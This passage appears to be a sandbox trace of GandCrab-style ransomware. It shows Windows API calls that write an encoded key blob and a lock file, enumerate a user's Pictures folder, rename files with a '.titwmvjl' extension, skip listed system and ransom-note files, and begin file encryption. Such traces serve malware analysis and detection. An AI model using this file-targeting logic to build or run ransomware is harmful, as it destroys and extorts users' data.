6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0093.997] WriteFile (in: hFile=0x2ac, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259f274, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259f274*=0x2162, lpOverlapped=0x0) returned 1 [0093.998] CloseHandle (hObject=0x2ac) returned 1 [0093.998] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.998] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0093.999] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x27, wMilliseconds=0x13e)) [0093.999] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.999] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0093.999] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0093.999] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\d2ca4a09d2ca4deb61a.lock") returned 60 [0093.999] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\v_u2\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2ac [0094.000] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.000] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.000] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\") returned 36 [0094.000] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\*" [0094.000] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\*", fInfoLevelId=0x1, lpFindFileData=0x259f290, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259f290) returned 0x5034f8 [0094.000] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0094.000] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0094.000] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0094.001] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0094.001] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0094.001] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0094.001] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0094.001] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\d2ca4a09d2ca4deb61a.lock" [0094.001] lstrlenW (lpString=".titwmvjl") returned 9 [0094.001] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\d2ca4a09d2ca4deb61a.lock") returned 60 [0094.001] VirtualAlloc (lpAddress=0x0, dwSize=0xb8, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0094.001] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 69 [0094.001] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\d2ca4a09d2ca4deb61a.lock") returned 60 [0094.001] lstrlenW (lpString=".lock") returned 5 [0094.001] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.001] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0094.001] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.001] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.001] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0094.002] lstrcmpW (lpString1="h1Bf6lmj.bmp", lpString2=".") returned 1 [0094.002] lstrcmpW (lpString1="h1Bf6lmj.bmp", lpString2="..") returned 1 [0094.002] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\", lpString2="h1Bf6lmj.bmp" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\h1Bf6lmj.bmp") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\h1Bf6lmj.bmp" [0094.002] lstrlenW (lpString=".titwmvjl") returned 9 [0094.002] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\h1Bf6lmj.bmp") returned 48 [0094.002] VirtualAlloc (lpAddress=0x0, dwSize=0xa0, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0094.002] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\h1Bf6lmj.bmp.titwmvjl") returned 57 [0094.002] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\h1Bf6lmj.bmp") returned 48 [0094.002] lstrlenW (lpString=".bmp") returned 4 [0094.002] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.002] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".bmp ") returned 5 [0094.002] lstrcmpiW (lpString1=".bmp", lpString2=".titwmvjl") returned -1 [0094.002] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.002] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\h1Bf6lmj.bmp") returned 48 [0094.002] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\h1Bf6lmj.bmp") returned 48 [0094.002] lstrcmpiW (lpString1="h1Bf6lmj.bmp", lpString2="desktop.ini") returned 1 [0094.002] lstrcmpiW (lpString1="h1Bf6lmj.bmp", lpString2="autorun.inf") returned 1 [0094.002] lstrcmpiW (lpString1="h1Bf6lmj.bmp", lpString2="ntuser.dat") returned -1 [0094.002] lstrcmpiW (lpString1="h1Bf6lmj.bmp", lpString2="iconcache.db") returned -1 [0094.002] lstrcmpiW (lpString1="h1Bf6lmj.bmp", lpString2="bootsect.bak") returned 1 [0094.002] lstrcmpiW (lpString1="h1Bf6lmj.bmp", lpString2="boot.ini") returned 1 [0094.002] lstrcmpiW (lpString1="h1Bf6lmj.bmp", lpString2="ntuser.dat.log") returned -1 [0094.002] lstrcmpiW (lpString1="h1Bf6lmj.bmp", lpString2="thumbs.db") returned -1 [0094.003] lstrcmpiW (lpString1="h1Bf6lmj.bmp", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0094.003] lstrcmpiW (lpString1="h1Bf6lmj.bmp", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0094.003] lstrcmpiW (lpString1="h1Bf6lmj.bmp", lpString2="KRAB-DECRYPT.html") returned -1 [0094.003] lstrcmpiW (lpString1="h1Bf6lmj.bmp", lpString2="CRAB-DECRYPT.html") returned 1 [0094.003] lstrcmpiW (lpString1="h1Bf6lmj.bmp", lpString2="KRAB-DECRYPT.txt") returned -1 [0094.003] lstrcmpiW (lpString1="h1Bf6lmj.bmp", lpString2="CRAB-DECRYPT.txt") returned 1 [0094.003] lstrcmpiW (lpString1="h1Bf6lmj.bmp", lpString2="ntldr") returned -1 [0094.003] lstrcmpiW (lpString1="h1Bf6lmj.bmp", lpString2="NTDETECT.COM") returned -1 [0094.003] lstrcmpiW (lpString1="h1Bf6lmj.bmp", lpString2="Bootfont.bin") returned 1 [0094.003] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\h1Bf6lmj.bmp") returned 48 [0094.003] lstrlenW (lpString=".bmp") returned 4 [0094.003] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.003] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".bmp ") returned 5 [0094.003] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.003] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.003] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\h1Bf6lmj.bmp" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\v_u2\\h1bf6lmj.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2b4 [0094.004] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.004] ReadFile (in: hFile=0x2b4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f1dc*=0x21c, lpOverlapped=0x0) returned 1 [0094.004] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.004] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.005] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0094.005] 